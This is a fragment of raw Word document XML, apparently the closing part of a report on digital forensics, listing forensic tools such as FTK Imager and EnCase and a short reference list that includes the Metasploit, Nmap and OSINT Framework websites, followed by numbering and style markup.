          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccessData's FTK Imager. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="3"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MailXaminer. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="3"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Encase. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="3"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DBXtract. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:after="1144" w:line="265" w:lineRule="auto"/>
        <w:ind w:right="56" w:hanging="376"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Paraben, etc. </w:t>
      </w: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4750F9" w:rsidRDefault="004750F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p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="003D065D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="003D065D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="003D065D">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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidR="00E62C19" w:rsidRPr="004750F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="56"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>http://youtube.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="00E62C19">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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId62" w:history="1">
        <w:r w:rsidR="00E62C19" w:rsidRPr="004750F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="56"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://osintframework.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="00E62C19">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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63" w:history="1">
        <w:r w:rsidR="00E62C19" w:rsidRPr="004750F9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="56"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00E62C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>https://nmap.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="001E33B8">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sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003D065D" w:rsidRPr="004750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D065D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81181C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B53B9A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E6E53EA"/>
    <w:lvl w:ilvl="0" w:tplc="4009000B">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingding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E3A0507"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DFC53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8C095D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1B054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F52992"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07442BD2"/>
    <w:lvl w:ilvl="0" w:tplc="4009000B">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4F19DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="745C65AA"/>
    <w:lvl w:ilvl="0" w:tplc="91A262AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376"/>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1" w:tplc="9C32ADCA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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C5F6F1D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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416E6CDE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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ED184546">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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F37C8174">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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A55AD5AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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0EECF61E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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9B823404">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2EB81453"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F38AB5E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B86826"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F5E6D3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76C6B5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="574C7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D10FB3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC1A9902"/>
    <w:lvl w:ilvl="0" w:tplc="893C50BE">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="236"/>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1" w:tplc="12A6B4EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>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A7260C26">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>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47C8410C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>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F8DCCDC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>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5A9EFD4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>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E3082C84">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>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1496FBD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>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EE46A162">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="496858FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DAC5A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142A7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD8C5B3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4C094888"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA7002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502A1819"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E836DCF0"/>
    <w:lvl w:ilvl="0" w:tplc="0364614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05D425F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="029A073A"/>
    <w:lvl w:ilvl="0" w:tplc="40090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="5E5E5E"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CDD61084">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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F1722E2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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61BAB830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B31CD35E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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769E013A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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5C92A920">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B184AFA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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5994FB70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="574F364F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BAE6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49001D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0188065C"/>
    <w:lvl w:ilvl="0" w:tplc="50482C16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376"/>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1" w:tplc="CDD61084">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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F1722E2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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61BAB830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B31CD35E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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769E013A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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5C92A920">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B184AFA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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5994FB70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D4B55A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B56EDEF0"/>
    <w:lvl w:ilvl="0" w:tplc="17D83E62">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="236"/>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1" w:tplc="870EB2EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>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B35E958A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>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3508F436">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>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5F5CC704">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>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807EBFAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>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8A36CA88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>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3FAABE34">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>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6CA0A61C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>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18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F191C14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E16A2D3A"/>
    <w:lvl w:ilvl="0" w:tplc="50482C16">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="5E5E5E"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CDD61084">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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F1722E2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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61BAB830">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B31CD35E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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769E013A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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5C92A920">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>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B184AFA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>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5994FB70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>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19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="62B041F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65EEF35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4D67F76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B9898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76782D8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0820EFC6"/>
    <w:lvl w:ilvl="0" w:tplc="05668A6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376"/>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1" w:tplc="D32CBCB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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2" w:tplc="601A5378">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="18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3" w:tplc="83A840B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="25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4" w:tplc="315AB65A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="206AD144">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="D570C5DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="B58A0AAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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lvl w:ilvl="8" w:tplc="0D00FCF8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="5E5E5E"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D4E7613"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02EC7ED0"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D9638B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF10D05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10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="14"/>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D22"/>
    <w:rsid w:val="00100314"/>
    <w:rsid w:val="001B2E36"/>
    <w:rsid w:val="001E33B8"/>
    <w:rsid w:val="003C3BE1"/>
    <w:rsid w:val="003D065D"/>
    <w:rsid w:val="004750F9"/>
    <w:rsid w:val="005B2D4C"/>
    <w:rsid w:val="005F51AA"/>
    <w:rsid w:val="00785C5C"/>
    <w:rsid w:val="00840B61"/>
    <w:rsid w:val="00943135"/>
    <w:rsid w:val="009B15A7"/>
    <w:rsid w:val="00A266D6"/>
    <w:rsid w:val="00C2655D"/>
    <w:rsid w:val="00CB6D22"/>
    <w:rsid w:val="00D348F6"/>
    <w:rsid w:val="00D6593D"/>
    <w:rsid w:val="00E50840"/>
    <w:rsid w:val="00E62C19"/>
    <w:rsid w:val="00EE2A76"/>
    <w:rsid w:val="00FC30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3D712"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D5533806-84CE-472A-B487-B2FCB2EE7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D22"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CB6D22"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="1"/>
      <w:ind w:left="10" w:right="44" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="36"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004750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B6D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D06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D22"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="36"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00CB6D2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CB6D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9B15A7"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00D348F6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="001B2E36"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid">
    <w:name w:val="TableGrid"/>
    <w:rsid w:val="00785C5C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00785C5C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="003D065D"/>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4750F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099073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
